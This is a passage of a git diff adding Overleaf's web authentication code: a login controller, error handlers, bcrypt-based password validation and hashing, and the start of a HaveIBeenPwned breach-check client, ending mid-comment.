+const OError = require('@overleaf/o-error') +const LoginRateLimiter = require('../Security/LoginRateLimiter') +const UserUpdater = require('../User/UserUpdater') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const querystring = require('querystring') +const Settings = require('@overleaf/settings') +const basicAuth = require('basic-auth') +const tsscmp = require('tsscmp') +const UserHandler = require('../User/UserHandler') +const UserSessionsManager = require('../User/UserSessionsManager') +const Analytics = require('../Analytics/AnalyticsManager') +const passport = require('passport') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const UrlHelper = require('../Helpers/UrlHelper') +const AsyncFormHelper = require('../Helpers/AsyncFormHelper') +const _ = require('lodash') +const UserAuditLogHandler = require('../User/UserAuditLogHandler') +const AnalyticsRegistrationSourceHelper = require('../Analytics/AnalyticsRegistrationSourceHelper') +const { + acceptsJson, +} = require('../../infrastructure/RequestContentTypeDetection') +const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') +const Modules = require('../../infrastructure/Modules') +const { expressify, promisify } = require('@overleaf/promise-utils') +const { handleAuthenticateErrors } = require('./AuthenticationErrors') +const EmailHelper = require('../Helpers/EmailHelper') + +function send401WithChallenge(res) { + res.setHeader('WWW-Authenticate', 'OverleafLogin') + res.sendStatus(401) +} + +function checkCredentials(userDetailsMap, user, password) { + const expectedPassword = userDetailsMap.get(user) + const userExists = userDetailsMap.has(user) && expectedPassword // user exists with a non-null password + const isValid = userExists && tsscmp(expectedPassword, password) + if (!isValid) { + logger.err({ user }, 'invalid login details') + } + Metrics.inc('security.http-auth.check-credentials', 1, { + path: userExists ? 'known-user' : 'unknown-user', + status: isValid ? 'pass' : 'fail', + }) + return isValid +} + +function reduceStaffAccess(staffAccess) { + const reducedStaffAccess = {} + for (const field in staffAccess) { + if (staffAccess[field]) { + reducedStaffAccess[field] = true + } + } + return reducedStaffAccess +} + +function userHasStaffAccess(user) { + return user.staffAccess && Object.values(user.staffAccess).includes(true) +} + +// TODO: Finish making these methods async +const AuthenticationController = { + serializeUser(user, callback) { + if (!user._id || !user.email) { + const err = new Error('serializeUser called with non-user object') + logger.warn({ user }, err.message) + return callback(err) + } + const lightUser = { + _id: user._id, + first_name: user.first_name, + last_name: user.last_name, + email: user.email, + referal_id: user.referal_id, + session_created: new Date().toISOString(), + ip_address: user._login_req_ip, + must_reconfirm: user.must_reconfirm, + v1_id: user.overleaf != null ? 
user.overleaf.id : undefined, + analyticsId: user.analyticsId || user._id, + alphaProgram: user.alphaProgram || undefined, // only store if set + betaProgram: user.betaProgram || undefined, // only store if set + } + if (user.isAdmin) { + lightUser.isAdmin = true + } + if (userHasStaffAccess(user)) { + lightUser.staffAccess = reduceStaffAccess(user.staffAccess) + } + + callback(null, lightUser) + }, + + deserializeUser(user, cb) { + cb(null, user) + }, + + passportLogin(req, res, next) { + // This function is middleware which wraps the passport.authenticate middleware, + // so we can send back our custom `{message: {text: "", type: ""}}` responses on failure, + // and send a `{redir: ""}` response on success + passport.authenticate( + 'local', + { keepSessionInfo: true }, + async function (err, user, info) { + if (err) { + return next(err) + } + if (user) { + // `user` is either a user object or false + AuthenticationController.setAuditInfo(req, { + method: 'Password login', + }) + + try { + // We could investigate whether this can be done together with 'preFinishLogin' instead of being its own hook + await Modules.promises.hooks.fire( + 'saasLogin', + { email: user.email }, + req + ) + await AuthenticationController.promises.finishLogin(user, req, res) + } catch (err) { + return next(err) + } + } else { + if (info.redir != null) { + return res.json({ redir: info.redir }) + } else { + res.status(info.status || 200) + delete info.status + const body = { message: info } + const { errorReason } = info + if (errorReason) { + body.errorReason = errorReason + delete info.errorReason + } + return res.json(body) + } + } + } + )(req, res, next) + }, + + async _finishLoginAsync(user, req, res) { + if (user === false) { + return AsyncFormHelper.redirect(req, res, '/login') + } // OAuth2 'state' mismatch + + if (user.suspended) { + return AsyncFormHelper.redirect(req, res, '/account-suspended') + } + + if (Settings.adminOnlyLogin && !hasAdminAccess(user)) { + return res.status(403).json({ + message: { type: 'error', text: 'Admin only panel' }, + }) + } + + const auditInfo = AuthenticationController.getAuditInfo(req) + + const anonymousAnalyticsId = req.session.analyticsId + const isNewUser = req.session.justRegistered || false + + const results = await Modules.promises.hooks.fire( + 'preFinishLogin', + req, + res, + user + ) + + if (results.some(result => result && result.doNotFinish)) { + return + } + + if (user.must_reconfirm) { + return AuthenticationController._redirectToReconfirmPage(req, res, user) + } + + const redir = + AuthenticationController.getRedirectFromSession(req) || '/project' + + _loginAsyncHandlers(req, user, anonymousAnalyticsId, isNewUser) + const userId = user._id + + await UserAuditLogHandler.promises.addEntry( + userId, + 'login', + userId, + req.ip, + auditInfo + ) + + await _afterLoginSessionSetupAsync(req, user) + + AuthenticationController._clearRedirectFromSession(req) + AnalyticsRegistrationSourceHelper.clearSource(req.session) + AnalyticsRegistrationSourceHelper.clearInbound(req.session) + AsyncFormHelper.redirect(req, res, redir) + }, + + finishLogin(user, req, res, next) { + AuthenticationController._finishLoginAsync(user, req, res).catch(err => + next(err) + ) + }, + + async doPassportLogin(req, username, password, done) { + let user, info + try { + ;({ user, info } = await AuthenticationController._doPassportLogin( + req, + username, + password + )) + } catch (error) { + return done(error) + } + return done(undefined, user, info) + }, + + /** + * + * @param req + * 
@param username + * @param password + * @returns {Promise<{ user: any, info: any}>} + */ + async _doPassportLogin(req, username, password) { + const email = EmailHelper.parseEmail(username) + if (!email) { + Metrics.inc('login_failure_reason', 1, { status: 'invalid_email' }) + return { + user: null, + info: { + status: 400, + type: 'error', + text: req.i18n.translate('email_address_is_invalid'), + }, + } + } + AuthenticationController.setAuditInfo(req, { method: 'Password login' }) + + const { fromKnownDevice } = AuthenticationController.getAuditInfo(req) + const auditLog = { + ipAddress: req.ip, + info: { method: 'Password login', fromKnownDevice }, + } + + let user, isPasswordReused + try { + ;({ user, isPasswordReused } = + await AuthenticationManager.promises.authenticate( + { email }, + password, + auditLog, + { + enforceHIBPCheck: !fromKnownDevice, + } + )) + } catch (error) { + return { + user: false, + info: handleAuthenticateErrors(error, req), + } + } + + if (user && AuthenticationController.captchaRequiredForLogin(req, user)) { + Metrics.inc('login_failure_reason', 1, { status: 'captcha_missing' }) + return { + user: false, + info: { + text: req.i18n.translate('cannot_verify_user_not_robot'), + type: 'error', + errorReason: 'cannot_verify_user_not_robot', + status: 400, + }, + } + } else if (user) { + if ( + isPasswordReused && + AuthenticationController.getRedirectFromSession(req) == null + ) { + AuthenticationController.setRedirectInSession( + req, + '/compromised-password' + ) + } + + // async actions + return { user, info: undefined } + } else { + Metrics.inc('login_failure_reason', 1, { status: 'password_invalid' }) + AuthenticationController._recordFailedLogin() + logger.debug({ email }, 'failed log in') + return { + user: false, + info: { + type: 'error', + key: 'invalid-password-retry-or-reset', + status: 401, + }, + } + } + }, + + captchaRequiredForLogin(req, user) { + switch (AuthenticationController.getAuditInfo(req).captcha) { + case 'trusted': + case 'disabled': + return false + case 'solved': + return false + case 'skipped': { + let required = false + if (user.lastFailedLogin) { + const requireCaptchaUntil = + user.lastFailedLogin.getTime() + + Settings.elevateAccountSecurityAfterFailedLogin + required = requireCaptchaUntil >= Date.now() + } + Metrics.inc('force_captcha_on_login', 1, { + status: required ? 
'yes' : 'no', + }) + return required + } + default: + throw new Error('captcha middleware missing in handler chain') + } + }, + + ipMatchCheck(req, user) { + if (req.ip !== user.lastLoginIp) { + NotificationsBuilder.ipMatcherAffiliation(user._id).create( + req.ip, + () => {} + ) + } + return UserUpdater.updateUser( + user._id.toString(), + { + $set: { lastLoginIp: req.ip }, + }, + () => {} + ) + }, + + requireLogin() { + const doRequest = function (req, res, next) { + if (next == null) { + next = function () {} + } + if (!SessionManager.isUserLoggedIn(req.session)) { + if (acceptsJson(req)) return send401WithChallenge(res) + return AuthenticationController._redirectToLoginOrRegisterPage(req, res) + } else { + req.user = SessionManager.getSessionUser(req.session) + req.logger?.addFields({ userId: req.user._id }) + return next() + } + } + + return doRequest + }, + + /** + * @param {string} scope + * @return {import('express').Handler} + */ + requireOauth(scope) { + if (typeof scope !== 'string' || !scope) { + throw new Error( + "requireOauth() expects a non-empty string as 'scope' parameter" + ) + } + + // require this here because module may not be included in some versions + const Oauth2Server = require('../../../../modules/oauth2-server/app/src/Oauth2Server') + const middleware = async (req, res, next) => { + const request = new Oauth2Server.Request(req) + const response = new Oauth2Server.Response(res) + try { + const token = await Oauth2Server.server.authenticate( + request, + response, + { scope } + ) + req.oauth = { access_token: token.accessToken } + req.oauth_token = token + req.oauth_user = token.user + next() + } catch (err) { + if ( + err.code === 400 && + err.message === 'Invalid request: malformed authorization header' + ) { + err.code = 401 + } + // send all other errors + res + .status(err.code) + .json({ error: err.name, error_description: err.message }) + } + } + return expressify(middleware) + }, + + _globalLoginWhitelist: [], + addEndpointToLoginWhitelist(endpoint) { + return AuthenticationController._globalLoginWhitelist.push(endpoint) + }, + + requireGlobalLogin(req, res, next) { + if ( + AuthenticationController._globalLoginWhitelist.includes( + req._parsedUrl.pathname + ) + ) { + return next() + } + + if (req.headers.authorization != null) { + AuthenticationController.requirePrivateApiAuth()(req, res, next) + } else if (SessionManager.isUserLoggedIn(req.session)) { + next() + } else { + logger.debug( + { url: req.url }, + 'user trying to access endpoint not in global whitelist' + ) + if (acceptsJson(req)) return send401WithChallenge(res) + AuthenticationController.setRedirectInSession(req) + res.redirect('/login') + } + }, + + validateAdmin(req, res, next) { + const adminDomains = Settings.adminDomains + if ( + !adminDomains || + !(Array.isArray(adminDomains) && adminDomains.length) + ) { + return next() + } + const user = SessionManager.getSessionUser(req.session) + if (!hasAdminAccess(user)) { + return next() + } + const email = user.email + if (email == null) { + return next( + new OError('[ValidateAdmin] Admin user without email address', { + userId: user._id, + }) + ) + } + if (!adminDomains.find(domain => email.endsWith(`@${domain}`))) { + return next( + new OError('[ValidateAdmin] Admin user with invalid email domain', { + email, + userId: user._id, + }) + ) + } + return next() + }, + + checkCredentials, + + requireBasicAuth: function (userDetails) { + const userDetailsMap = new Map(Object.entries(userDetails)) + return function (req, res, next) { + const 
credentials = basicAuth(req) + if ( + !credentials || + !checkCredentials(userDetailsMap, credentials.name, credentials.pass) + ) { + send401WithChallenge(res) + Metrics.inc('security.http-auth', 1, { status: 'reject' }) + } else { + Metrics.inc('security.http-auth', 1, { status: 'accept' }) + next() + } + } + }, + + requirePrivateApiAuth() { + return AuthenticationController.requireBasicAuth(Settings.httpAuthUsers) + }, + + setAuditInfo(req, info) { + if (!req.__authAuditInfo) { + req.__authAuditInfo = {} + } + Object.assign(req.__authAuditInfo, info) + }, + + getAuditInfo(req) { + return req.__authAuditInfo || {} + }, + + setRedirectInSession(req, value) { + if (value == null) { + value = + Object.keys(req.query).length > 0 + ? `${req.path}?${querystring.stringify(req.query)}` + : `${req.path}` + } + if ( + req.session != null && + !/^\/(socket.io|js|stylesheets|img)\/.*$/.test(value) && + !/^.*\.(png|jpeg|svg)$/.test(value) + ) { + const safePath = UrlHelper.getSafeRedirectPath(value) + return (req.session.postLoginRedirect = safePath) + } + }, + + _redirectToLoginOrRegisterPage(req, res) { + if ( + req.query.zipUrl != null || + req.session.sharedProjectData || + req.path === '/user/subscription/new' + ) { + AuthenticationController._redirectToRegisterPage(req, res) + } else { + AuthenticationController._redirectToLoginPage(req, res) + } + }, + + _redirectToLoginPage(req, res) { + logger.debug( + { url: req.url }, + 'user not logged in so redirecting to login page' + ) + AuthenticationController.setRedirectInSession(req) + const url = `/login?${querystring.stringify(req.query)}` + res.redirect(url) + Metrics.inc('security.login-redirect') + }, + + _redirectToReconfirmPage(req, res, user) { + logger.debug( + { url: req.url }, + 'user needs to reconfirm so redirecting to reconfirm page' + ) + req.session.reconfirm_email = user != null ? 
user.email : undefined + const redir = '/user/reconfirm' + AsyncFormHelper.redirect(req, res, redir) + }, + + _redirectToRegisterPage(req, res) { + logger.debug( + { url: req.url }, + 'user not logged in so redirecting to register page' + ) + AuthenticationController.setRedirectInSession(req) + const url = `/register?${querystring.stringify(req.query)}` + res.redirect(url) + Metrics.inc('security.login-redirect') + }, + + _recordSuccessfulLogin(userId, callback) { + if (callback == null) { + callback = function () {} + } + UserUpdater.updateUser( + userId.toString(), + { + $set: { lastLoggedIn: new Date() }, + $inc: { loginCount: 1 }, + }, + function (error) { + if (error != null) { + callback(error) + } + Metrics.inc('user.login.success') + callback() + } + ) + }, + + _recordFailedLogin(callback) { + Metrics.inc('user.login.failed') + if (callback) callback() + }, + + getRedirectFromSession(req) { + let safePath + const value = _.get(req, ['session', 'postLoginRedirect']) + if (value) { + safePath = UrlHelper.getSafeRedirectPath(value) + } + return safePath || null + }, + + _clearRedirectFromSession(req) { + if (req.session != null) { + delete req.session.postLoginRedirect + } + }, +} + +function _afterLoginSessionSetup(req, user, callback) { + req.login(user, { keepSessionInfo: true }, function (err) { + if (err) { + OError.tag(err, 'error from req.login', { + user_id: user._id, + }) + return callback(err) + } + delete req.session.__tmp + delete req.session.csrfSecret + req.session.save(function (err) { + if (err) { + OError.tag(err, 'error saving regenerated session after login', { + user_id: user._id, + }) + return callback(err) + } + UserSessionsManager.trackSession(user, req.sessionID, function () {}) + if (!req.deviceHistory) { + // Captcha disabled or SSO-based login. + return callback() + } + req.deviceHistory.add(user.email) + req.deviceHistory + .serialize(req.res) + .catch(err => { + logger.err({ err }, 'cannot serialize deviceHistory') + }) + .finally(() => callback()) + }) + }) +} + +const _afterLoginSessionSetupAsync = promisify(_afterLoginSessionSetup) + +function _loginAsyncHandlers(req, user, anonymousAnalyticsId, isNewUser) { + UserHandler.populateTeamInvites(user, err => { + if (err != null) { + logger.warn({ err }, 'error setting up login data') + } + }) + LoginRateLimiter.recordSuccessfulLogin(user.email, () => {}) + AuthenticationController._recordSuccessfulLogin(user._id, () => {}) + AuthenticationController.ipMatchCheck(req, user) + Analytics.recordEventForUserInBackground(user._id, 'user-logged-in', { + source: req.session.saml + ? 
'saml' + : req.user_info?.auth_provider || 'email-password', + }) + Analytics.identifyUser(user._id, anonymousAnalyticsId, isNewUser) + + logger.debug( + { email: user.email, userId: user._id.toString() }, + 'successful log in' + ) + + req.session.justLoggedIn = true + // capture the request ip for use when creating the session + return (user._login_req_ip = req.ip) +} + +AuthenticationController.promises = { + finishLogin: AuthenticationController._finishLoginAsync, +} + +module.exports = AuthenticationController diff --git a/services/web/app/src/Features/Authentication/AuthenticationErrors.js b/services/web/app/src/Features/Authentication/AuthenticationErrors.js new file mode 100644 index 0000000..c5dc8ba --- /dev/null +++ b/services/web/app/src/Features/Authentication/AuthenticationErrors.js @@ -0,0 +1,58 @@ +const Metrics = require('@overleaf/metrics') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const Errors = require('../Errors/Errors') + +class InvalidEmailError extends Errors.BackwardCompatibleError {} +class InvalidPasswordError extends Errors.BackwardCompatibleError {} +class ParallelLoginError extends Errors.BackwardCompatibleError {} +class PasswordMustBeDifferentError extends Errors.BackwardCompatibleError {} +class PasswordReusedError extends Errors.BackwardCompatibleError {} + +function handleAuthenticateErrors(error, req) { + if (error.message === 'password is too long') { + Metrics.inc('login_failure_reason', 1, { + status: 'password_is_too_long', + }) + return { + status: 422, + type: 'error', + key: 'password-too-long', + text: req.i18n.translate('password_too_long_please_reset'), + } + } + if (error instanceof ParallelLoginError) { + Metrics.inc('login_failure_reason', 1, { status: 'parallel_login' }) + return { status: 429 } + } + if (error instanceof PasswordReusedError) { + Metrics.inc('login_failure_reason', 1, { + status: 'password_compromised', + }) + const text = `${req.i18n + .translate('password_compromised_try_again_or_use_known_device_or_reset') + .replace('<0>', '') + .replace('</0>', ' (https://haveibeenpwned.com/passwords)') + .replace('<1>', '') + .replace('</1>', ` (${Settings.siteUrl}/user/password/reset)`)}.` + return { + status: 400, + type: 'error', + key: 'password-compromised', + text, + } + } + Metrics.inc('login_failure_reason', 1, { + status: error instanceof OError ? 
error.name : 'error', + }) + throw error +} + +module.exports = { + InvalidEmailError, + InvalidPasswordError, + ParallelLoginError, + PasswordMustBeDifferentError, + PasswordReusedError, + handleAuthenticateErrors, +} diff --git a/services/web/app/src/Features/Authentication/AuthenticationManager.js b/services/web/app/src/Features/Authentication/AuthenticationManager.js new file mode 100644 index 0000000..6ac5109 --- /dev/null +++ b/services/web/app/src/Features/Authentication/AuthenticationManager.js @@ -0,0 +1,477 @@ +const Settings = require('@overleaf/settings') +const { User } = require('../../models/User') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const bcrypt = require('bcrypt') +const EmailHelper = require('../Helpers/EmailHelper') +const { + InvalidEmailError, + InvalidPasswordError, + ParallelLoginError, + PasswordMustBeDifferentError, + PasswordReusedError, +} = require('./AuthenticationErrors') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') +const HaveIBeenPwned = require('./HaveIBeenPwned') +const UserAuditLogHandler = require('../User/UserAuditLogHandler') +const logger = require('@overleaf/logger') +const DiffHelper = require('../Helpers/DiffHelper') +const Metrics = require('@overleaf/metrics') + +const BCRYPT_ROUNDS = Settings.security.bcryptRounds || 12 +const BCRYPT_MINOR_VERSION = Settings.security.bcryptMinorVersion || 'a' +const MAX_SIMILARITY = 0.7 + +function _exceedsMaximumLengthRatio(password, maxSimilarity, value) { + const passwordLength = password.length + const lengthBoundSimilarity = (maxSimilarity / 2) * passwordLength + const valueLength = value.length + return ( + passwordLength >= 10 * valueLength && valueLength < lengthBoundSimilarity + ) +} + +const _checkWriteResult = function (result) { + // for MongoDB + return !!(result && result.modifiedCount === 1) +} + +function _validatePasswordNotTooLong(password) { + // bcrypt has a hard limit of 72 characters. + if (password.length > 72) { + return new InvalidPasswordError({ + message: 'password is too long', + info: { code: 'too_long' }, + }) + } + return null +} + +function _metricsForSuccessfulPasswordMatch(password) { + const validationResult = AuthenticationManager.validatePassword(password) + const status = + validationResult === null ? 'success' : validationResult?.info?.code + Metrics.inc('check-password', { status }) + return null +} + +const AuthenticationManager = { + async _checkUserPassword(query, password) { + // Using Mongoose for legacy reasons here. The returned User instance + // gets serialized into the session and there may be subtle differences + // between the user returned by Mongoose vs mongodb (such as default values) + const user = await User.findOne(query).exec() + + if (!user || !user.hashedPassword) { + return { user: null, match: null } + } + + let rounds = 0 + try { + rounds = bcrypt.getRounds(user.hashedPassword) + } catch (err) { + let prefix, suffix, length + if (typeof user.hashedPassword === 'string') { + length = user.hashedPassword.length + if (user.hashedPassword.length > 50) { + // A full bcrypt hash is 60 characters long. 
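+        // Anatomy of a bcrypt hash (for context): "$2a$12$" (version + cost)
+        // followed by a 22-char salt and 31-char checksum. Keeping only a
+        // short prefix and suffix means no usable hash material is logged.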
+ prefix = user.hashedPassword.slice(0, '$2a$12$x'.length) + suffix = user.hashedPassword.slice(-4) + } else if (user.hashedPassword.length > 20) { + prefix = user.hashedPassword.slice(0, 4) + suffix = user.hashedPassword.slice(-4) + } else { + prefix = user.hashedPassword.slice(0, 4) + } + } + logger.warn( + { + err, + userId: user._id, + hashedPassword: { + type: typeof user.hashedPassword, + length, + prefix, + suffix, + }, + }, + 'unexpected user.hashedPassword value' + ) + } + Metrics.inc('bcrypt', 1, { + method: 'compare', + path: rounds, + }) + + const match = await bcrypt.compare(password, user.hashedPassword) + + if (match) { + _metricsForSuccessfulPasswordMatch(password) + } + + return { user, match } + }, + + async authenticate(query, password, auditLog, { enforceHIBPCheck = true }) { + const { user, match } = await AuthenticationManager._checkUserPassword( + query, + password + ) + + if (!user) { + return { user: null } + } + + const update = { $inc: { loginEpoch: 1 } } + if (!match) { + update.$set = { lastFailedLogin: new Date() } + } + + const result = await User.updateOne( + { _id: user._id, loginEpoch: user.loginEpoch }, + update, + {} + ).exec() + + if (result.modifiedCount !== 1) { + throw new ParallelLoginError() + } + + if (!match) { + if (!auditLog) { + return { user: null } + } else { + try { + await UserAuditLogHandler.promises.addEntry( + user._id, + 'failed-password-match', + user._id, + auditLog.ipAddress, + auditLog.info + ) + } catch (err) { + logger.error( + { userId: user._id, err, info: auditLog.info }, + 'Error while adding AuditLog entry for failed-password-match' + ) + } + return { user: null } + } + } + await AuthenticationManager.checkRounds(user, user.hashedPassword, password) + + let isPasswordReused + try { + isPasswordReused = + await HaveIBeenPwned.promises.checkPasswordForReuse(password) + } catch (err) { + logger.err({ err }, 'cannot check password for re-use') + } + + if (isPasswordReused && enforceHIBPCheck) { + throw new PasswordReusedError() + } + + return { user, isPasswordReused } + }, + + validateEmail(email) { + const parsed = EmailHelper.parseEmail(email) + if (!parsed) { + return new InvalidEmailError({ message: 'email not valid' }) + } + return null + }, + + // validates a password based on a similar set of rules previously used by `passfield.js` on the frontend + // note that `passfield.js` enforced more rules than this, but these are the most commonly set. + // returns null on success, or an error object. 
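+  //
+  // Illustrative examples (inputs hypothetical):
+  //   validatePassword('short', 'user@example.com')
+  //     => InvalidPasswordError with info.code === 'too_short'
+  //   validatePassword('a sufficiently long passphrase', 'user@example.com')
+  //     => null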
+ validatePassword(password, email) { + if (password == null) { + return new InvalidPasswordError({ + message: 'password not set', + info: { code: 'not_set' }, + }) + } + + Metrics.inc('try-validate-password') + + let allowAnyChars, min, max + if (Settings.passwordStrengthOptions) { + allowAnyChars = Settings.passwordStrengthOptions.allowAnyChars === true + if (Settings.passwordStrengthOptions.length) { + min = Settings.passwordStrengthOptions.length.min + max = Settings.passwordStrengthOptions.length.max + } + } + allowAnyChars = !!allowAnyChars + min = min || 8 + max = max || 72 + + // we don't support passwords > 72 characters in length, because bcrypt truncates them + if (max > 72) { + max = 72 + } + + if (password.length < min) { + return new InvalidPasswordError({ + message: 'password is too short', + info: { code: 'too_short' }, + }) + } + if (password.length > max) { + return new InvalidPasswordError({ + message: 'password is too long', + info: { code: 'too_long' }, + }) + } + const passwordLengthError = _validatePasswordNotTooLong(password) + if (passwordLengthError) { + return passwordLengthError + } + if ( + !allowAnyChars && + !AuthenticationManager._passwordCharactersAreValid(password) + ) { + return new InvalidPasswordError({ + message: 'password contains an invalid character', + info: { code: 'invalid_character' }, + }) + } + if (typeof email === 'string' && email !== '') { + const startOfEmail = email.split('@')[0] + if ( + password.includes(email) || + password.includes(startOfEmail) || + email.includes(password) + ) { + return new InvalidPasswordError({ + message: 'password contains part of email address', + info: { code: 'contains_email' }, + }) + } + try { + const passwordTooSimilarError = + AuthenticationManager._validatePasswordNotTooSimilar(password, email) + if (passwordTooSimilarError) { + Metrics.inc('password-too-similar-to-email') + return new InvalidPasswordError({ + message: 'password is too similar to email address', + info: { code: 'too_similar' }, + }) + } + } catch (error) { + logger.error( + { error }, + 'error while checking password similarity to email' + ) + } + // TODO: remove this check once the password-too-similar checks are active? + } + return null + }, + + async setUserPassword(user, password) { + return await AuthenticationManager.setUserPasswordInV2(user, password) + }, + + async checkRounds(user, hashedPassword, password) { + // Temporarily disable this function, TODO: re-enable this + if (Settings.security.disableBcryptRoundsUpgrades) { + Metrics.inc('bcrypt_check_rounds', 1, { status: 'disabled' }) + return + } + // check current number of rounds and rehash if necessary + const currentRounds = bcrypt.getRounds(hashedPassword) + if (currentRounds < BCRYPT_ROUNDS) { + Metrics.inc('bcrypt_check_rounds', 1, { status: 'upgrade' }) + return await AuthenticationManager._setUserPasswordInMongo(user, password) + } else { + Metrics.inc('bcrypt_check_rounds', 1, { status: 'success' }) + } + }, + + async hashPassword(password) { + // Double-check the size to avoid truncating in bcrypt. 
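+    // bcrypt only reads the first 72 bytes of its input, so two long
+    // passwords sharing those first bytes would otherwise hash identically.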
+ const error = _validatePasswordNotTooLong(password) + if (error) { + throw error + } + + const salt = await bcrypt.genSalt(BCRYPT_ROUNDS, BCRYPT_MINOR_VERSION) + + Metrics.inc('bcrypt', 1, { + method: 'hash', + path: BCRYPT_ROUNDS, + }) + return await bcrypt.hash(password, salt) + }, + + async setUserPasswordInV2(user, password) { + if (!user || !user.email || !user._id) { + throw new Error('invalid user object') + } + const validationError = this.validatePassword(password, user.email) + if (validationError) { + throw validationError + } + // check if we can log in with this password. In which case we should reject it, + // because it is the same as the existing password. + const { match } = await AuthenticationManager._checkUserPassword( + { _id: user._id }, + password + ) + + if (match) { + throw new PasswordMustBeDifferentError() + } + + let isPasswordReused + try { + isPasswordReused = + await HaveIBeenPwned.promises.checkPasswordForReuse(password) + } catch (error) { + logger.err({ error }, 'cannot check password for re-use') + } + + if (isPasswordReused) { + throw new PasswordReusedError() + } + + // password is strong enough or the validation with the service did not happen + return await this._setUserPasswordInMongo(user, password) + }, + + async _setUserPasswordInMongo(user, password) { + const hash = await this.hashPassword(password) + const result = await db.users.updateOne( + { _id: new ObjectId(user._id.toString()) }, + { + $set: { + hashedPassword: hash, + }, + $unset: { + password: true, + }, + } + ) + + return _checkWriteResult(result) + }, + + _passwordCharactersAreValid(password) { + let digits, letters, lettersUp, symbols + if ( + Settings.passwordStrengthOptions && + Settings.passwordStrengthOptions.chars + ) { + digits = Settings.passwordStrengthOptions.chars.digits + letters = Settings.passwordStrengthOptions.chars.letters + lettersUp = Settings.passwordStrengthOptions.chars.letters_up + symbols = Settings.passwordStrengthOptions.chars.symbols + } + digits = digits || '1234567890' + letters = letters || 'abcdefghijklmnopqrstuvwxyz' + lettersUp = lettersUp || 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + symbols = symbols || '@#$%^&*()-_=+[]{};:<>/?!£€.,' + + for (let charIndex = 0; charIndex <= password.length - 1; charIndex++) { + if ( + digits.indexOf(password[charIndex]) === -1 && + letters.indexOf(password[charIndex]) === -1 && + lettersUp.indexOf(password[charIndex]) === -1 && + symbols.indexOf(password[charIndex]) === -1 + ) { + return false + } + } + return true + }, + + /** + * Check if the password is similar to (parts of) the email address. + * For now, this merely sends a metric when the password and + * email address are deemed to be too similar to each other. + * Later we will reject passwords that fail this check. 
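+   *
+   * Illustrative example: for "jsmith@example.com" the strings compared
+   * against the password are the full address plus its \W+ and @ splits,
+   * i.e. "jsmith", "example", "com" and "example.com".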
+ * + * This logic was borrowed from the django project: + * https://github.com/django/django/blob/fa3afc5d86f1f040922cca2029d6a34301597a70/django/contrib/auth/password_validation.py#L159-L214 + */ + _validatePasswordNotTooSimilar(password, email) { + password = password.toLowerCase() + email = email.toLowerCase() + const stringsToCheck = [email] + .concat(email.split(/\W+/)) + .concat(email.split(/@/)) + for (const emailPart of stringsToCheck) { + if (!_exceedsMaximumLengthRatio(password, MAX_SIMILARITY, emailPart)) { + const similarity = DiffHelper.stringSimilarity(password, emailPart) + if (similarity > MAX_SIMILARITY) { + return new Error('password is too similar to email') + } + } + } + }, + + getMessageForInvalidPasswordError(error, req) { + const errorCode = error?.info?.code + const message = { + type: 'error', + } + switch (errorCode) { + case 'not_set': + message.key = 'password-not-set' + message.text = req.i18n.translate('invalid_password_not_set') + break + case 'invalid_character': + message.key = 'password-invalid-character' + message.text = req.i18n.translate('invalid_password_invalid_character') + break + case 'contains_email': + message.key = 'password-contains-email' + message.text = req.i18n.translate('invalid_password_contains_email') + break + case 'too_similar': + message.key = 'password-too-similar' + message.text = req.i18n.translate('invalid_password_too_similar') + break + case 'too_short': + message.key = 'password-too-short' + message.text = req.i18n.translate('invalid_password_too_short', { + minLength: Settings.passwordStrengthOptions?.length?.min || 8, + }) + break + case 'too_long': + message.key = 'password-too-long' + message.text = req.i18n.translate('invalid_password_too_long', { + maxLength: Settings.passwordStrengthOptions?.length?.max || 72, + }) + break + default: + logger.error({ err: error }, 'Unknown password validation error code') + message.text = req.i18n.translate('invalid_password') + break + } + return message + }, +} + +module.exports = { + _validatePasswordNotTooSimilar: + AuthenticationManager._validatePasswordNotTooSimilar, // Private function exported for tests + validateEmail: AuthenticationManager.validateEmail, + validatePassword: AuthenticationManager.validatePassword, + getMessageForInvalidPasswordError: + AuthenticationManager.getMessageForInvalidPasswordError, + authenticate: callbackifyMultiResult(AuthenticationManager.authenticate, [ + 'user', + 'isPasswordReused', + ]), + setUserPassword: callbackify(AuthenticationManager.setUserPassword), + checkRounds: callbackify(AuthenticationManager.checkRounds), + hashPassword: callbackify(AuthenticationManager.hashPassword), + setUserPasswordInV2: callbackify(AuthenticationManager.setUserPasswordInV2), + promises: AuthenticationManager, +} diff --git a/services/web/app/src/Features/Authentication/HaveIBeenPwned.js b/services/web/app/src/Features/Authentication/HaveIBeenPwned.js new file mode 100644 index 0000000..c400fc7 --- /dev/null +++ b/services/web/app/src/Features/Authentication/HaveIBeenPwned.js @@ -0,0 +1,127 @@ +/* + This module is operating on raw user passwords. Be very defensive. + Pay special attention when passing the password or even a hash/prefix around. + We need to ensure that no parts of it get logged or returned on either the + happy path or via an error (message or attributes). 
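+
+  For context: the range API used below is k-anonymous. Only the first five
+  hex characters of the password's SHA-1 ever leave this process, and the
+  returned suffixes are compared locally.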
+ */ + +const { callbackify } = require('util') +const { fetchString } = require('@overleaf/fetch-utils') +const crypto = require('crypto') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') + +const HEX_CHARS_UPPER = '1234567890ABCDEF' +const API_ERROR = new Error('cannot contact HaveIBeenPwned api') +const INVALID_PREFIX = new Error( + 'This is not a valid hex prefix. Rejecting to pass it to HaveIBeenPwned' +) +const INVALID_RESPONSE = new Error('cannot consume HaveIBeenPwned api response') +const INVALID_SCORE = new Error( + 'non integer score returned by HaveIBeenPwned api' +) +const CODED_ERROR_MESSAGES = [ + API_ERROR, + INVALID_PREFIX, + INVALID_RESPONSE, + INVALID_SCORE, +].map(err => err.message) + +async function getScoresForPrefix(prefix) { + if ( + typeof prefix !== 'string' || + prefix.length !== 5 || + Array.from(prefix).some(c => !HEX_CHARS_UPPER.includes(c)) + ) { + // Make sure we do not pass arbitrary objects to the api. + throw INVALID_PREFIX + } + try { + return await fetchString( + `${Settings.apis.haveIBeenPwned.url}/range/${prefix}`, + { + headers: { + 'User-Agent': 'www.overleaf.com', + // 